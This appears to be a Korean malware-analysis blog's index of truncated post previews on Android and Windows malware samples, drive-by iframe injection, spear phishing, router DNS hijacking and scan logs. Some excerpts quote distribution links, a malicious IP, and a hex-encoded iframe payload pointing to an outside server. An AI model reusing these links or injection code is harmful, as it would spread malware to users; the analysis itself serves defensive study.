annyoung

불과 몇 시간전, 샘플을 입수해서 분석하기로 결정하고 분석해봤다.5분? 정도 봤는데 25번 포트로 통신하는거보니 SMTP라고 생각했고 정보유출에 핵심을 두고 분석하였다.이메일이 삭제되어 정확히 드랍된 파일인지, 숙주인지 모르겠다. 그냥 분석 해보려고 한다. FileName axoleoyt.exe MD5 D555F23D6B5C902C7455A9FC9EF5FDB7 SHA-1 7D7B35177D2E9A872133247C40360FF197FF4A9C Packer X 파일명을 보니 아마도 랜덤으로 생성 되었고, 드랍된 파일로 추정된다. .rdata:0040DA64 00000011 C Inter your Name:.rdata:0040DA78 00000011 C Inter your mail: 해당 바이너리의 스트링을..

보호되어 있는 글입니다.

단축 URL과 개인서버를 사용하여 유포중이다.bit.ly/1QjzEjT 캡챠를 사용하여 자동 크롤링 방지 FileName com.spo.plus.plus.apk MD5 82A7B070E5F7DA62297B7F7448BC5C51 SHA-1 FBF45A32D4B50169C6E5BA6547CA13E8CCB0C862 Packer X드랍되는 어플리케이션은 위의 정보와 같다. 패킹도 안되어 있고 거의 기본으로 되어 있는 귀여운 어플리케이션이다. public class AppContext extends Application{ public static final String BASEDIR = Environment.getExternalStorageDirectory().toString() + "/Download"; pub..

고운빛 베이비시터 사이트에서 iframe을 사용하여 몰래 유포 중이다. 코드 더럽게 길네.. hex로 인코딩되어 복호화 하게 된다.복호화 하는 방법은 대체적으로 간단하다. >>> hexList = ['\x66\x61\x6b\x65\x3d','\x66\x61\x6b\x65\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x32\x31\x31\x2e\x35\x38\x2e\x32\x35\x35\x2e\x32\x31\x39\x2f\x75\x73\x61\x2f\x6d\x79\x67..

이메일을 통해서 첨부된 악성코드(흔히 말하는 기업에서의 스피어 피싱)를 분석하려고 한다. 샘플 수집의 경로는 몇 일전 TLS callback에 대해서 물어봐주셨던 분에게 메일을 통해서 받았다. FileName fax_info.exe MD5 99750A17CF9141BB10BD537BEC0A2DB0 SHA-1 7F16CB193145C69D49C19F4CEA08134AC8862CDD Packer X 압축을 사용하여 1차적으로 백신 우회를 하였고, pdf icon으로 위장하여 피해자가 실행하게 끔 된 바이너리다. IAT만 봐도 작은 기능을 제외하고 큰 기능을 먼저 보자면 원격제어 기능을 가지고 있는 악성코드라는 것을 알 수 있다. 이유는 다음 내용에 설명하겠다. void *__stdcall sub_401560..

한 3일전부터 8080포트로 운영하고 있는 웹서버 인데, 귀여운 로그가 찍혔다. 80.98.171.*** - - [27/May/2015:17:19:49 +0900] "GET /Ringing.at.your.dorbell! HTTP/1.0" 404 222Ringing at your doorbell!! 80.98.171.*** - - [27/May/2015:17:19:52 +0900] "GET /Diagnostics.asp HTTP/1.0" 404 213 그리고 내 서버는 apache+php인데 asp로 접근하다니.. 무튼 귀여운 헝가리 친구였다.

http://67.198.144.251 한층 개선된 chrome의 최신버전이 출시되었습니다. 업데이트 후 이용해주십시오. 마침 지인이 공유기가 해킹 당해서 샘플을 빠르게 얻을 수 있었다. SNS에서는 "크롬 바이러스"라고 알려져 있는 것 같다. 크롬 바이러스가 아니라 공유기의 허술한 설정으로 인해 공유기 DNS 변조가 되어 악성코드가 유포되고 있는 것이다.. 이러한 일이 왜 일어나냐면, 위에서도 말했듯이 공유기의 허술한 설정으로 인하여 공유기 DNS가 변조되었기 때문이다. 공유기가 해킹되는 취약한 설정 1. 원격 관리 설정을 해놓은 경우 (외부에서 공유기 관리 페이지에 접근이 가능해짐.) 2. 공유기에 아이디/비밀번호가 설정이 되어 있지 않거나 기본 아이디/패스워드일 경우 3. 취약한 버전의 공유기를 쓰..

FileName avref.apk MD5 F5439A55FAA1DB7EEB3F85D4DCEBE013 SHA-1 9E915732B7A1314FFE06C20D769F9A390C331B94 Packer X 어디서 굴러들어온 녀석인진 모르겠다만, 정보유출지가 차단되어 쓸모없는 녀석이 되어 버렸다. 기기 관리자 활성화 + 원격제어(파일 다운, 설치, 제거, 문자 보내기, 연락처 유출 등) + 스미싱(뱅킹 정보 유출, 인증서 유출 등)이 사용되는 샘플이였다. package com.a;import android.app.admin.DeviceAdminReceiver;import android.content.Context;import android.content.Intent; public class MyAdminRece..

2.230.101.197 - - [17/Feb/2015:02:57:42 +0900] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 219 68.251.212.152 - - [17/Feb/2015:06:04:20 +0900] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 219 188.15.169.236 - - [17/Feb/2015:06:34:08 +0900] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 219 183.178.12.50 - - [17/Feb/2015:07:12:52 +0900] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 219 94.160.217.5 - - [17/Feb..

맥으로 분석하면 참 쉽다. 악성코드 감염에 거의 걱정하지 않아도 되고 소스보기를 이용해서 디코딩된 결과를 볼 수도 있고. java applet을 이용하여 exploit을 시도한다. value를 참조하여 악성코드를 다운 및 실행하여 자동으로 감염 시킨다. 무슨 exploit인지 궁금한 분들은 MvJwWu.jar를 분석해보면 된다.(여기까지 깊게 나가진 않겠음) FileName win.exe MD5 B5B7DB16FF7AD62A387E1BFC9EEED959 SHA-1 84EF6838A7DF06415DC3CF19D38B2BFDB142EDF4 Packer nsPack ver 3.x-4.1 reg by North Star 유포지 hxxp://sanaesan.com/after_img/win.exe Packer가 b..